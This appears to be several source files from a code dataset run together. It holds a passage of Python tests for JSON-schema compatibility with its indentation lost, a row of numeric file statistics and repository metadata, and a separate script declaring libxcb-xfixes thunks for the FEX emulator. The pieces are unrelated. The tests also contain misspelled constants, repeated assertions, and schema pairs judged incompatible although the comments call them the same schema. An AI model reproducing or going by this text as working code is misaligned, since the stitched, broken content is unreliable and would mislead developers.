def test_true_and_false_schemas() -> None:
schemas_are_compatible(
writer=NOT_OF_EMPTY_SCHEMA,
reader=NOT_OF_TRUE_SCHEMA,
msg="both schemas reject every value",
)
# the schemas below are just different ways of representing the same schema
# schemas_are_compatible(
# writer=NOT_OF_TRUE_SCHEMA,
# reader=FALSE_SCHEMA,
# msg="both schemas reject every value",
# )
# schemas_are_compatible(
# writer=NOT_OF_EMPTY_SCHEMA,
# reader=FALSE_SCHEMA,
# msg="both schemas reject every value",
# )
schemas_are_compatible(
writer=TRUE_SCHEMA,
reader=EMPTY_SCHEMA,
msg="both schemas accept every value",
)
# the true schema accepts anything ... including nothing
# schemas_are_compatible(
# writer=NOT_OF_EMPTY_SCHEMA,
# reader=TRUE_SCHEMA,
# msg=COMPATIBLE_READER_EVERY_VALUE_IS_ACCEPTED,
# )
# schemas_are_compatible(
# writer=NOT_OF_TRUE_SCHEMA,
# reader=TRUE_SCHEMA,
# msg=COMPATIBLE_READER_EVERY_VALUE_IS_ACCEPTED,
# )
# schemas_are_compatible(
# writer=NOT_OF_EMPTY_SCHEMA,
# reader=TRUE_SCHEMA,
# msg=COMPATIBLE_READER_EVERY_VALUE_IS_ACCEPTED,
# )
# the reader rejects every value
not_schemas_are_compatible(
writer=TRUE_SCHEMA,
reader=NOT_OF_EMPTY_SCHEMA,
msg=INCOMPATIBLE_READER_IS_FALSE_SCHEMA,
)
not_schemas_are_compatible(
writer=TRUE_SCHEMA,
reader=NOT_OF_TRUE_SCHEMA,
msg=INCOMPATIBLE_READER_IS_FALSE_SCHEMA,
)
not_schemas_are_compatible(
writer=TRUE_SCHEMA,
reader=A_INT_B_INT_REQUIRED_OBJECT_SCHEMA,
msg=INCOMPATIBLE_READER_CHANGED_FIELD_TYPE,
)
not_schemas_are_compatible(
writer=FALSE_SCHEMA,
reader=A_INT_B_INT_REQUIRED_OBJECT_SCHEMA,
msg=INCOMPATIBLE_READER_HAS_A_NEW_REQUIRED_FIELDg,
)
not_schemas_are_compatible(
writer=NOT_OF_TRUE_SCHEMA,
reader=FALSE_SCHEMA,
msg=COMPATIBILIY,
)
not_schemas_are_compatible(
writer=FALSE_SCHEMA,
reader=NOT_OF_TRUE_SCHEMA,
msg=COMPATIBILIY,
)
not_schemas_are_compatible(
writer=FALSE_SCHEMA,
reader=NOT_OF_EMPTY_SCHEMA,
msg=COMPATIBILIY,
)
not_schemas_are_compatible(
writer=NOT_OF_EMPTY_SCHEMA,
reader=FALSE_SCHEMA,
msg=COMPATIBILIY,
)
not_schemas_are_compatible(
writer=TRUE_SCHEMA,
reader=NOT_OF_EMPTY_SCHEMA,
msg=COMPATIBILIY,
)
not_schemas_are_compatible(
writer=NOT_OF_EMPTY_SCHEMA,
reader=TRUE_SCHEMA,
msg=COMPATIBILIY,
)
not_schemas_are_compatible(
writer=TRUE_SCHEMA,
reader=NOT_OF_TRUE_SCHEMA,
msg=COMPATIBILIY,
)
not_schemas_are_compatible(
writer=NOT_OF_TRUE_SCHEMA,
reader=TRUE_SCHEMA,
msg=COMPATIBILIY,
)
not_schemas_are_compatible(
writer=TRUE_SCHEMA,
reader=NOT_OF_EMPTY_SCHEMA,
msg=COMPATIBILIY,
)
not_schemas_are_compatible(
writer=NOT_OF_EMPTY_SCHEMA,
reader=TRUE_SCHEMA,
msg=COMPATIBILIY,
)
def test_schema_restrict_attributes_is_incompatible() -> None:
not_schemas_are_compatible(
writer=STRING_SCHEMA,
reader=MAX_LENGTH_SCHEMA,
msg=INCOMPATIBLE_READER_RESTRICTED_ACCEPTED_VALUES,
)
not_schemas_are_compatible(
writer=MAX_LENGTH_SCHEMA,
reader=MAX_LENGTH_DECREASED_SCHEMA,
msg=INCOMPATIBLE_READER_RESTRICTED_ACCEPTED_VALUES,
)
not_schemas_are_compatible(
writer=STRING_SCHEMA,
reader=MIN_LENGTH_SCHEMA,
msg=INCOMPATIBLE_READER_RESTRICTED_ACCEPTED_VALUES,
)
not_schemas_are_compatible(
writer=MIN_LENGTH_SCHEMA,
reader=MIN_LENGTH_INCREASED_SCHEMA,
msg=INCOMPATIBLE_READER_RESTRICTED_ACCEPTED_VALUES,
)
not_schemas_are_compatible(
writer=STRING_SCHEMA,
reader=MIN_PATTERN_SCHEMA,
msg=INCOMPATIBLE_READER_RESTRICTED_ACCEPTED_VALUES,
)
not_schemas_are_compatible(
writer=MIN_PATTERN_SCHEMA,
reader=MIN_PATTERN_STRICT_SCHEMA,
msg=INCOMPATIBLE_READER_RESTRICTED_ACCEPTED_VALUES,
)
not_schemas_are_compatible(
writer=INT_SCHEMA,
reader=MAXIMUM_INTEGER_SCHEMA,
msg=INCOMPATIBLE_READER_RESTRICTED_ACCEPTED_VALUES,
)
not_schemas_are_compatible(
writer=INT_SCHEMA,
reader=MAXIMUM_NUMBER_SCHEMA,
msg=INCOMPATIBLE_READER_RESTRICTED_ACCEPTED_VALUES,
)
not_schemas_are_compatible(
writer=NUMBER_SCHEMA,
reader=MAXIMUM_NUMBER_SCHEMA,
msg=INCOMPATIBLE_READER_RESTRICTED_ACCEPTED_VALUES,
)
not_schemas_are_compatible(
writer=MAXIMUM_NUMBER_SCHEMA,
reader=MAXIMUM_DECREASED_NUMBER_SCHEMA,
msg=INCOMPATIBLE_READER_RESTRICTED_ACCEPTED_VALUES,
)
not_schemas_are_compatible(
writer=INT_SCHEMA,
reader=MINIMUM_NUMBER_SCHEMA,
msg=INCOMPATIBLE_READER_RESTRICTED_ACCEPTED_VALUES,
)
not_schemas_are_compatible(
writer=NUMBER_SCHEMA,
reader=MINIMUM_NUMBER_SCHEMA,
msg=INCOMPATIBLE_READER_RESTRICTED_ACCEPTED_VALUES,
)
not_schemas_are_compatible(
writer=MINIMUM_NUMBER_SCHEMA,
reader=MINIMUM_INCREASED_NUMBER_SCHEMA,
msg=INCOMPATIBLE_READER_RESTRICTED_ACCEPTED_VALUES,
)
not_schemas_are_compatible(
writer=INT_SCHEMA,
reader=EXCLUSIVE_MAXIMUM_NUMBER_SCHEMA,
msg=INCOMPATIBLE_READER_RESTRICTED_ACCEPTED_VALUES,
)
not_schemas_are_compatible(
writer=NUMBER_SCHEMA,
reader=EXCLUSIVE_MAXIMUM_NUMBER_SCHEMA,
msg=INCOMPATIBLE_READER_RESTRICTED_ACCEPTED_VALUES,
)
not_schemas_are_compatible(
writer=EXCLUSIVE_MAXIMUM_NUMBER_SCHEMA,
reader=EXCLUSIVE_MAXIMUM_DECREASED_NUMBER_SCHEMA,
msg=INCOMPATIBLE_READER_RESTRICTED_ACCEPTED_VALUES,
)
not_schemas_are_compatible(
writer=NUMBER_SCHEMA,
reader=EXCLUSIVE_MINIMUM_NUMBER_SCHEMA,
msg=INCOMPATIBLE_READER_RESTRICTED_ACCEPTED_VALUES,
)
not_schemas_are_compatible(
writer=INT_SCHEMA,
reader=EXCLUSIVE_MINIMUM_NUMBER_SCHEMA,
msg=INCOMPATIBLE_READER_RESTRICTED_ACCEPTED_VALUES,
)
not_schemas_are_compatible(
writer=EXCLUSIVE_MINIMUM_NUMBER_SCHEMA,
reader=EXCLUSIVE_MINIMUM_INCREASED_NUMBER_SCHEMA,
msg=INCOMPATIBLE_READER_RESTRICTED_ACCEPTED_VALUES,
)
not_schemas_are_compatible(
writer=OBJECT_SCHEMA,
reader=MAX_PROPERTIES_SCHEMA,
msg=INCOMPATIBLE_READER_RESTRICTED_ACCEPTED_VALUES,
)
not_schemas_are_compatible(
writer=MAX_PROPERTIES_SCHEMA,
reader=MAX_PROPERTIES_DECREASED_SCHEMA,
msg=INCOMPATIBLE_READER_RESTRICTED_ACCEPTED_VALUES,
)
not_schemas_are_compatible(
writer=OBJECT_SCHEMA,
reader=MIN_PROPERTIES_SCHEMA,
msg=INCOMPATIBLE_READER_RESTRICTED_ACCEPTED_VALUES,
)
not_schemas_are_compatible(
writer=MIN_PROPERTIES_SCHEMA,
reader=MIN_PROPERTIES_INCREASED_SCHEMA,
msg=INCOMPATIBLE_READER_RESTRICTED_ACCEPTED_VALUES,
)
not_schemas_are_compatible(
writer=ARRAY_SCHEMA,
reader=MAX_ITEMS_SCHEMA,
msg=INCOMPATIBLE_READER_RESTRICTED_ACCEPTED_VALUES,
)
not_schemas_are_compatible(
writer=MAX_ITEMS_SCHEMA,
reader=MAX_ITEMS_DECREASED_SCHEMA,
msg=INCOMPATIBLE_READER_RESTRICTED_ACCEPTED_VALUES,
)
not_schemas_are_compatible(
writer=ARRAY_SCHEMA,
reader=MIN_ITEMS_SCHEMA,
msg=INCOMPATIBLE_READER_RESTRICTED_ACCEPTED_VALUES,
)
not_schemas_are_compatible(
writer=MIN_ITEMS_SCHEMA,
reader=MIN_ITEMS_INCREASED_SCHEMA,
msg=INCOMPATIBLE_READER_RESTRICTED_ACCEPTED_VALUES,
)
def test_schema_broadenning_attributes_is_compatible() -> None:
schemas_are_compatible(
writer=MAX_LENGTH_SCHEMA,
reader=STRING_SCHEMA,
msg=COMPATIBLE_READER_FIELD_TYPE_IS_A_SUPERSET,
)
schemas_are_compatible(
writer=MAX_LENGTH_DECREASED_SCHEMA,
reader=MAX_LENGTH_SCHEMA,
msg=COMPATIBLE_READER_FIELD_TYPE_IS_A_SUPERSET,
)
schemas_are_compatible(
writer=MIN_LENGTH_SCHEMA,
reader=STRING_SCHEMA,
msg=COMPATIBLE_READER_FIELD_TYPE_IS_A_SUPERSET,
)
schemas_are_compatible(
writer=MIN_LENGTH_INCREASED_SCHEMA,
reader=MIN_LENGTH_SCHEMA,
msg=COMPATIBLE_READER_FIELD_TYPE_IS_A_SUPERSET,
)
schemas_are_compatible(
writer=MIN_PATTERN_SCHEMA,
reader=STRING_SCHEMA,
msg=COMPATIBLE_READER_FIELD_TYPE_IS_A_SUPERSET,
)
schemas_are_compatible(
writer=MAXIMUM_INTEGER_SCHEMA,
reader=INT_SCHEMA,
msg=COMPATIBLE_READER_FIELD_TYPE_IS_A_SUPERSET,
)
schemas_are_compatible(
writer=MAXIMUM_NUMBER_SCHEMA,
reader=NUMBER_SCHEMA,
msg=COMPATIBLE_READER_FIELD_TYPE_IS_A_SUPERSET,
)
schemas_are_compatible(
writer=MAXIMUM_DECREASED_NUMBER_SCHEMA,
reader=MAXIMUM_NUMBER_SCHEMA,
msg=COMPATIBLE_READER_FIELD_TYPE_IS_A_SUPERSET,
)
schemas_are_compatible(
writer=MINIMUM_INTEGER_SCHEMA,
reader=INT_SCHEMA,
msg=COMPATIBLE_READER_FIELD_TYPE_IS_A_SUPERSET,
)
schemas_are_compatible(
writer=MINIMUM_NUMBER_SCHEMA,
reader=NUMBER_SCHEMA,
msg=COMPATIBLE_READER_FIELD_TYPE_IS_A_SUPERSET,
)
schemas_are_compatible(
writer=MINIMUM_INCREASED_NUMBER_SCHEMA,
reader=MINIMUM_NUMBER_SCHEMA,
msg=COMPATIBLE_READER_FIELD_TYPE_IS_A_SUPERSET,
)
schemas_are_compatible(
writer=EXCLUSIVE_MAXIMUM_INTEGER_SCHEMA,
reader=INT_SCHEMA,
msg=COMPATIBLE_READER_FIELD_TYPE_IS_A_SUPERSET,
)
schemas_are_compatible(
writer=EXCLUSIVE_MAXIMUM_NUMBER_SCHEMA,
reader=NUMBER_SCHEMA,
msg=COMPATIBLE_READER_FIELD_TYPE_IS_A_SUPERSET,
)
schemas_are_compatible(
writer=EXCLUSIVE_MAXIMUM_DECREASED_NUMBER_SCHEMA,
reader=EXCLUSIVE_MAXIMUM_NUMBER_SCHEMA,
msg=COMPATIBLE_READER_FIELD_TYPE_IS_A_SUPERSET,
)
schemas_are_compatible(
writer=EXCLUSIVE_MINIMUM_NUMBER_SCHEMA,
reader=NUMBER_SCHEMA,
msg=COMPATIBLE_READER_FIELD_TYPE_IS_A_SUPERSET,
)
schemas_are_compatible(
writer=EXCLUSIVE_MINIMUM_INTEGER_SCHEMA,
reader=INT_SCHEMA,
msg=COMPATIBLE_READER_FIELD_TYPE_IS_A_SUPERSET,
)
schemas_are_compatible(
writer=EXCLUSIVE_MINIMUM_INCREASED_NUMBER_SCHEMA,
reader=EXCLUSIVE_MINIMUM_NUMBER_SCHEMA,
msg=COMPATIBLE_READER_FIELD_TYPE_IS_A_SUPERSET,
)
schemas_are_compatible(
writer=MAX_PROPERTIES_SCHEMA,
reader=OBJECT_SCHEMA,
msg=COMPATIBLE_READER_FIELD_TYPE_IS_A_SUPERSET,
)
schemas_are_compatible(
writer=MAX_PROPERTIES_DECREASED_SCHEMA,
reader=MAX_PROPERTIES_SCHEMA,
msg=COMPATIBLE_READER_FIELD_TYPE_IS_A_SUPERSET,
)
schemas_are_compatible(
writer=MIN_PROPERTIES_SCHEMA,
reader=OBJECT_SCHEMA,
msg=COMPATIBLE_READER_FIELD_TYPE_IS_A_SUPERSET,
)
schemas_are_compatible(
writer=MIN_PROPERTIES_INCREASED_SCHEMA,
reader=MIN_PROPERTIES_SCHEMA,
msg=COMPATIBLE_READER_FIELD_TYPE_IS_A_SUPERSET,
)
schemas_are_compatible(
writer=MAX_ITEMS_SCHEMA,
reader=ARRAY_SCHEMA,
msg=COMPATIBLE_READER_FIELD_TYPE_IS_A_SUPERSET,
)
schemas_are_compatible(
writer=MAX_ITEMS_DECREASED_SCHEMA,
reader=MAX_ITEMS_SCHEMA,
msg=COMPATIBLE_READER_FIELD_TYPE_IS_A_SUPERSET,
)
schemas_are_compatible(
writer=MIN_ITEMS_SCHEMA,
reader=ARRAY_SCHEMA,
msg=COMPATIBLE_READER_FIELD_TYPE_IS_A_SUPERSET,
)
schemas_are_compatible(
writer=MIN_ITEMS_INCREASED_SCHEMA,
reader=MIN_ITEMS_SCHEMA,
msg=COMPATIBLE_READER_FIELD_TYPE_IS_A_SUPERSET,
)
def test_pattern_properties():
schemas_are_compatible(
reader=OBJECT_SCHEMA,
writer=PATTERN_PROPERTY_ASTAR_OBJECT_SCHEMA,
msg=COMPATIBLE_READER_IS_OPEN_AND_IGNORE_UNKNOWN_VALUES,
)
# In backward compatibility mode it is allowed to delete fields
schemas_are_compatible(
reader=A_OBJECT_SCHEMA,
writer=PATTERN_PROPERTY_ASTAR_OBJECT_SCHEMA,
msg=COMPATIBILIY,
)
# In backward compatibility mode it is allowed to add optional fields
schemas_are_compatible(
reader=PATTERN_PROPERTY_ASTAR_OBJECT_SCHEMA,
writer=A_OBJECT_SCHEMA,
msg=COMPATIBILIY,
)
# - writer accept any value for `a`
# - reader requires it to be an `int`, therefore the other values became
# invalid
not_schemas_are_compatible(
reader=A_INT_OBJECT_SCHEMA,
writer=PATTERN_PROPERTY_ASTAR_OBJECT_SCHEMA,
msg=INCOMPATIBLE_READER_RESTRICTED_ACCEPTED_VALUES,
)
# - writer has property `b`
# - reader only accepts properties with match regex `a*`
not_schemas_are_compatible(
reader=PATTERN_PROPERTY_ASTAR_OBJECT_SCHEMA,
writer=B_INT_OBJECT_SCHEMA,
msg=INCOMPATIBLE_READER_IS_CLOSED_AND_REMOVED_FIELD,
)
def test_object_properties():
not_schemas_are_compatible(
reader=A_OBJECT_SCHEMA,
writer=OBJECT_SCHEMA,
msg=INCOMPATIBLE_READER_RESTRICTED_ACCEPTED_VALUES,
)
schemas_are_compatible(
reader=OBJECT_SCHEMA,
writer=A_OBJECT_SCHEMA,
msg=COMPATIBILIY,
)
not_schemas_are_compatible(
reader=A_INT_OBJECT_SCHEMA,
writer=OBJECT_SCHEMA,
msg=INCOMPATIBLE_READER_RESTRICTED_ACCEPTED_VALUES,
)
not_schemas_are_compatible(
reader=B_INT_OBJECT_SCHEMA,
writer=OBJECT_SCHEMA,
msg=INCOMPATIBLE_READER_RESTRICTED_ACCEPTED_VALUES,
)
def test_property_names():
schemas_are_compatible(
reader=OBJECT_SCHEMA,
writer=PROPERTY_NAMES_ASTAR_OBJECT_SCHEMA,
msg=COMPATIBLE_READER_IS_OPEN_AND_IGNORE_UNKNOWN_VALUES,
)
not_schemas_are_compatible(
reader=A_OBJECT_SCHEMA,
writer=PROPERTY_NAMES_ASTAR_OBJECT_SCHEMA,
msg=INCOMPATIBLE_READER_RESTRICTED_ACCEPTED_VALUES,
)
schemas_are_compatible(
reader=PROPERTY_NAMES_ASTAR_OBJECT_SCHEMA,
writer=A_OBJECT_SCHEMA,
msg=COMPATIBILIY,
)
# - writer accept any value for `a`
# - reader requires it to be an `int`, therefore the other values became
# invalid
not_schemas_are_compatible(
reader=A_INT_OBJECT_SCHEMA,
writer=PROPERTY_NAMES_ASTAR_OBJECT_SCHEMA,
msg=INCOMPATIBLE_READER_RESTRICTED_ACCEPTED_VALUES,
)
# - writer has property `b`
# - reader only accepts properties with match regex `a*`
schemas_are_compatible(
reader=PROPERTY_NAMES_ASTAR_OBJECT_SCHEMA,
writer=B_INT_OBJECT_SCHEMA,
msg=COMPATIBILIY,
)
def test_type_with_list():
# "type": [] is treated as a shortcut for anyOf
schemas_are_compatible(
reader=STRING_SCHEMA,
writer=TYPES_STRING_SCHEMA,
msg=COMPATIBLE_READER_EVERY_VALUE_IS_ACCEPTED,
)
schemas_are_compatible(
reader=TYPES_STRING_INT_SCHEMA,
writer=TYPES_STRING_SCHEMA,
msg=COMPATIBLE_READER_EVERY_VALUE_IS_ACCEPTED,
)
def test_ref():
schemas_are_compatible(
reader=ARRAY_OF_POSITIVE_INTEGER,
writer=ARRAY_OF_POSITIVE_INTEGER_THROUGH_REF,
msg="the schemas are the same",
)
schemas_are_compatible(
reader=ARRAY_OF_POSITIVE_INTEGER_THROUGH_REF,
writer=ARRAY_OF_POSITIVE_INTEGER,
msg="the schemas are the same",
)
| 32.449422 | 125 | 0.724382 | 5,405 | 44,910 | 5.454579 | 0.039223 | 0.081745 | 0.161454 | 0.145513 | 0.870735 | 0.830168 | 0.808222 | 0.776338 | 0.742724 | 0.679669 | 0 | 0.000658 | 0.222155 | 44,910 | 1,383 | 126 | 32.472885 | 0.8433 | 0.070207 | 0 | 0.711093 | 0 | 0 | 0.027889 | 0.007056 | 0 | 0 | 0 | 0 | 0.001656 | 1 | 0.019868 | false | 0 | 0.003311 | 0 | 0.023179 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
297de43283a799a3659859337f41ee72f18c4097 | 13,482 | py | Python | ThunkLibs/Generators/libxcb_xfixes.py | cobalt2727/FEX | 13087f8425aeaad28dc81bed46a83e1d72ff0db8 | [
"MIT"
] | 628 | 2020-03-06T14:01:32.000Z | 2022-03-31T06:35:14.000Z | ThunkLibs/Generators/libxcb_xfixes.py | cobalt2727/FEX | 13087f8425aeaad28dc81bed46a83e1d72ff0db8 | [
"MIT"
] | 576 | 2020-03-06T08:25:12.000Z | 2022-03-30T04:05:29.000Z | ThunkLibs/Generators/libxcb_xfixes.py | cobalt2727/FEX | 13087f8425aeaad28dc81bed46a83e1d72ff0db8 | [
"MIT"
] | 38 | 2020-03-07T06:10:00.000Z | 2022-03-29T09:27:36.000Z | #!/usr/bin/python3
from ThunkHelpers import *
lib_with_filename("libxcb_xfixes", "0", "libxcb-xfixes")
# FEX
fn("void FEX_xcb_xfixes_init_extension(xcb_connection_t *, xcb_extension_t *)"); no_unpack()
fn("size_t FEX_usable_size(void*)"); no_unpack()
fn("void FEX_free_on_host(void*)"); no_unpack()
fn("xcb_xfixes_query_version_cookie_t xcb_xfixes_query_version(xcb_connection_t *, uint32_t, uint32_t)"); no_pack()
fn("xcb_xfixes_query_version_cookie_t xcb_xfixes_query_version_unchecked(xcb_connection_t *, uint32_t, uint32_t)"); no_pack()
fn("xcb_xfixes_query_version_reply_t * xcb_xfixes_query_version_reply(xcb_connection_t *, xcb_xfixes_query_version_cookie_t, xcb_generic_error_t **)"); no_pack()
fn("xcb_void_cookie_t xcb_xfixes_change_save_set_checked(xcb_connection_t *, uint8_t, uint8_t, uint8_t, xcb_window_t)")
fn("xcb_void_cookie_t xcb_xfixes_change_save_set(xcb_connection_t *, uint8_t, uint8_t, uint8_t, xcb_window_t)")
fn("xcb_void_cookie_t xcb_xfixes_select_selection_input_checked(xcb_connection_t *, xcb_window_t, xcb_atom_t, uint32_t)")
fn("xcb_void_cookie_t xcb_xfixes_select_selection_input(xcb_connection_t *, xcb_window_t, xcb_atom_t, uint32_t)")
fn("xcb_void_cookie_t xcb_xfixes_select_cursor_input_checked(xcb_connection_t *, xcb_window_t, uint32_t)")
fn("xcb_void_cookie_t xcb_xfixes_select_cursor_input(xcb_connection_t *, xcb_window_t, uint32_t)")
fn("int xcb_xfixes_get_cursor_image_sizeof(const void *)")
fn("xcb_xfixes_get_cursor_image_cookie_t xcb_xfixes_get_cursor_image(xcb_connection_t *)")
fn("xcb_xfixes_get_cursor_image_cookie_t xcb_xfixes_get_cursor_image_unchecked(xcb_connection_t *)")
# ::Iterator::
fn("uint32_t * xcb_xfixes_get_cursor_image_cursor_image(const xcb_xfixes_get_cursor_image_reply_t *)")
fn("int xcb_xfixes_get_cursor_image_cursor_image_length(const xcb_xfixes_get_cursor_image_reply_t *)")
fn("xcb_generic_iterator_t xcb_xfixes_get_cursor_image_cursor_image_end(const xcb_xfixes_get_cursor_image_reply_t *)")
fn("xcb_xfixes_get_cursor_image_reply_t * xcb_xfixes_get_cursor_image_reply(xcb_connection_t *, xcb_xfixes_get_cursor_image_cookie_t, xcb_generic_error_t **)"); no_pack()
fn("void xcb_xfixes_region_next(xcb_xfixes_region_iterator_t *)")
fn("xcb_generic_iterator_t xcb_xfixes_region_end(xcb_xfixes_region_iterator_t)")
fn("int xcb_xfixes_create_region_sizeof(const void *, uint32_t)")
fn("xcb_void_cookie_t xcb_xfixes_create_region_checked(xcb_connection_t *, xcb_xfixes_region_t, uint32_t, const xcb_rectangle_t *)")
fn("xcb_void_cookie_t xcb_xfixes_create_region(xcb_connection_t *, xcb_xfixes_region_t, uint32_t, const xcb_rectangle_t *)")
# ::Iterator::
fn("xcb_rectangle_t * xcb_xfixes_create_region_rectangles(const xcb_xfixes_create_region_request_t *)")
fn("int xcb_xfixes_create_region_rectangles_length(const xcb_xfixes_create_region_request_t *)")
fn("xcb_rectangle_iterator_t xcb_xfixes_create_region_rectangles_iterator(const xcb_xfixes_create_region_request_t *)")
fn("xcb_void_cookie_t xcb_xfixes_create_region_from_bitmap_checked(xcb_connection_t *, xcb_xfixes_region_t, xcb_pixmap_t)")
fn("xcb_void_cookie_t xcb_xfixes_create_region_from_bitmap(xcb_connection_t *, xcb_xfixes_region_t, xcb_pixmap_t)")
fn("xcb_void_cookie_t xcb_xfixes_create_region_from_window_checked(xcb_connection_t *, xcb_xfixes_region_t, xcb_window_t, xcb_shape_kind_t)")
fn("xcb_void_cookie_t xcb_xfixes_create_region_from_window(xcb_connection_t *, xcb_xfixes_region_t, xcb_window_t, xcb_shape_kind_t)")
fn("xcb_void_cookie_t xcb_xfixes_create_region_from_gc_checked(xcb_connection_t *, xcb_xfixes_region_t, xcb_gcontext_t)")
fn("xcb_void_cookie_t xcb_xfixes_create_region_from_gc(xcb_connection_t *, xcb_xfixes_region_t, xcb_gcontext_t)")
fn("xcb_void_cookie_t xcb_xfixes_create_region_from_picture_checked(xcb_connection_t *, xcb_xfixes_region_t, xcb_render_picture_t)")
fn("xcb_void_cookie_t xcb_xfixes_create_region_from_picture(xcb_connection_t *, xcb_xfixes_region_t, xcb_render_picture_t)")
fn("xcb_void_cookie_t xcb_xfixes_destroy_region_checked(xcb_connection_t *, xcb_xfixes_region_t)")
fn("xcb_void_cookie_t xcb_xfixes_destroy_region(xcb_connection_t *, xcb_xfixes_region_t)")
fn("int xcb_xfixes_set_region_sizeof(const void *, uint32_t)")
fn("xcb_void_cookie_t xcb_xfixes_set_region_checked(xcb_connection_t *, xcb_xfixes_region_t, uint32_t, const xcb_rectangle_t *)")
fn("xcb_void_cookie_t xcb_xfixes_set_region(xcb_connection_t *, xcb_xfixes_region_t, uint32_t, const xcb_rectangle_t *)")
# ::Iterator::
fn("xcb_rectangle_t * xcb_xfixes_set_region_rectangles(const xcb_xfixes_set_region_request_t *)")
fn("int xcb_xfixes_set_region_rectangles_length(const xcb_xfixes_set_region_request_t *)")
fn("xcb_rectangle_iterator_t xcb_xfixes_set_region_rectangles_iterator(const xcb_xfixes_set_region_request_t *)")
fn("xcb_void_cookie_t xcb_xfixes_copy_region_checked(xcb_connection_t *, xcb_xfixes_region_t, xcb_xfixes_region_t)")
fn("xcb_void_cookie_t xcb_xfixes_copy_region(xcb_connection_t *, xcb_xfixes_region_t, xcb_xfixes_region_t)")
fn("xcb_void_cookie_t xcb_xfixes_union_region_checked(xcb_connection_t *, xcb_xfixes_region_t, xcb_xfixes_region_t, xcb_xfixes_region_t)")
fn("xcb_void_cookie_t xcb_xfixes_union_region(xcb_connection_t *, xcb_xfixes_region_t, xcb_xfixes_region_t, xcb_xfixes_region_t)")
fn("xcb_void_cookie_t xcb_xfixes_intersect_region_checked(xcb_connection_t *, xcb_xfixes_region_t, xcb_xfixes_region_t, xcb_xfixes_region_t)")
fn("xcb_void_cookie_t xcb_xfixes_intersect_region(xcb_connection_t *, xcb_xfixes_region_t, xcb_xfixes_region_t, xcb_xfixes_region_t)")
fn("xcb_void_cookie_t xcb_xfixes_subtract_region_checked(xcb_connection_t *, xcb_xfixes_region_t, xcb_xfixes_region_t, xcb_xfixes_region_t)")
fn("xcb_void_cookie_t xcb_xfixes_subtract_region(xcb_connection_t *, xcb_xfixes_region_t, xcb_xfixes_region_t, xcb_xfixes_region_t)")
fn("xcb_void_cookie_t xcb_xfixes_invert_region_checked(xcb_connection_t *, xcb_xfixes_region_t, xcb_rectangle_t, xcb_xfixes_region_t)")
fn("xcb_void_cookie_t xcb_xfixes_invert_region(xcb_connection_t *, xcb_xfixes_region_t, xcb_rectangle_t, xcb_xfixes_region_t)")
fn("xcb_void_cookie_t xcb_xfixes_translate_region_checked(xcb_connection_t *, xcb_xfixes_region_t, int16_t, int16_t)")
fn("xcb_void_cookie_t xcb_xfixes_translate_region(xcb_connection_t *, xcb_xfixes_region_t, int16_t, int16_t)")
fn("xcb_void_cookie_t xcb_xfixes_region_extents_checked(xcb_connection_t *, xcb_xfixes_region_t, xcb_xfixes_region_t)")
fn("xcb_void_cookie_t xcb_xfixes_region_extents(xcb_connection_t *, xcb_xfixes_region_t, xcb_xfixes_region_t)")
fn("int xcb_xfixes_fetch_region_sizeof(const void *)")
fn("xcb_xfixes_fetch_region_cookie_t xcb_xfixes_fetch_region(xcb_connection_t *, xcb_xfixes_region_t)")
fn("xcb_xfixes_fetch_region_cookie_t xcb_xfixes_fetch_region_unchecked(xcb_connection_t *, xcb_xfixes_region_t)")
# ::Iterator::
fn("xcb_rectangle_t * xcb_xfixes_fetch_region_rectangles(const xcb_xfixes_fetch_region_reply_t *)")
fn("int xcb_xfixes_fetch_region_rectangles_length(const xcb_xfixes_fetch_region_reply_t *)")
fn("xcb_rectangle_iterator_t xcb_xfixes_fetch_region_rectangles_iterator(const xcb_xfixes_fetch_region_reply_t *)")
fn("xcb_xfixes_fetch_region_reply_t * xcb_xfixes_fetch_region_reply(xcb_connection_t *, xcb_xfixes_fetch_region_cookie_t, xcb_generic_error_t **)"); no_pack()
fn("xcb_void_cookie_t xcb_xfixes_set_gc_clip_region_checked(xcb_connection_t *, xcb_gcontext_t, xcb_xfixes_region_t, int16_t, int16_t)")
fn("xcb_void_cookie_t xcb_xfixes_set_gc_clip_region(xcb_connection_t *, xcb_gcontext_t, xcb_xfixes_region_t, int16_t, int16_t)")
fn("xcb_void_cookie_t xcb_xfixes_set_window_shape_region_checked(xcb_connection_t *, xcb_window_t, xcb_shape_kind_t, int16_t, int16_t, xcb_xfixes_region_t)")
fn("xcb_void_cookie_t xcb_xfixes_set_window_shape_region(xcb_connection_t *, xcb_window_t, xcb_shape_kind_t, int16_t, int16_t, xcb_xfixes_region_t)")
fn("xcb_void_cookie_t xcb_xfixes_set_picture_clip_region_checked(xcb_connection_t *, xcb_render_picture_t, xcb_xfixes_region_t, int16_t, int16_t)")
fn("xcb_void_cookie_t xcb_xfixes_set_picture_clip_region(xcb_connection_t *, xcb_render_picture_t, xcb_xfixes_region_t, int16_t, int16_t)")
fn("int xcb_xfixes_set_cursor_name_sizeof(const void *)")
fn("xcb_void_cookie_t xcb_xfixes_set_cursor_name_checked(xcb_connection_t *, xcb_cursor_t, uint16_t, const char *)")
fn("xcb_void_cookie_t xcb_xfixes_set_cursor_name(xcb_connection_t *, xcb_cursor_t, uint16_t, const char *)")
# ::Iterator::
fn("char * xcb_xfixes_set_cursor_name_name(const xcb_xfixes_set_cursor_name_request_t *)")
fn("int xcb_xfixes_set_cursor_name_name_length(const xcb_xfixes_set_cursor_name_request_t *)")
fn("xcb_generic_iterator_t xcb_xfixes_set_cursor_name_name_end(const xcb_xfixes_set_cursor_name_request_t *)")
fn("int xcb_xfixes_get_cursor_name_sizeof(const void *)")
fn("xcb_xfixes_get_cursor_name_cookie_t xcb_xfixes_get_cursor_name(xcb_connection_t *, xcb_cursor_t)")
fn("xcb_xfixes_get_cursor_name_cookie_t xcb_xfixes_get_cursor_name_unchecked(xcb_connection_t *, xcb_cursor_t)")
# ::Iterator::
fn("char * xcb_xfixes_get_cursor_name_name(const xcb_xfixes_get_cursor_name_reply_t *)")
fn("int xcb_xfixes_get_cursor_name_name_length(const xcb_xfixes_get_cursor_name_reply_t *)")
fn("xcb_generic_iterator_t xcb_xfixes_get_cursor_name_name_end(const xcb_xfixes_get_cursor_name_reply_t *)")
